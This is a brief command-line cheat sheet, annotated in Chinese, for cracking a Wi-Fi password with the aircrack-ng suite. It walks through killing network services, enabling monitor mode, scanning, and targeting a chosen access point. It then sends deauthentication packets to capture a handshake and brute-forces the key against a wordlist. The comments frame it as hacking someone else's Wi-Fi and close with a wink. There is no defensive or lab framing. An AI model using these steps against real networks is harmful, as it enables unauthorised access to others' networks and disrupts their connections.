service network-manager stop //关闭网络服务
airmon-ng check kill // 清楚多余程序
iwconfig//查看网卡
airmon-ng start wlan0//打开无线网卡 最好用8187 3037的芯片
airodump-ng mon0 开始扫描wifi
airodump-ng --bssid C0:XX:XX:XX:XX -c 1 -w tmp mon0 //找到你想黑的wifi XX为 mac地址
aireplay-ng -0 2 -a C0:XX:XX:XX:XX:00 -c 14:XX:XX:XX:XX:B4 mon0 //截包
airmon-ng stop mon0//关闭网卡
service network-manager start //激活无线网卡 重新连上wifi
aircrack-ng tmp-01.cap -w /tmp/passwd.txt //破解密码
最后你懂得~~~~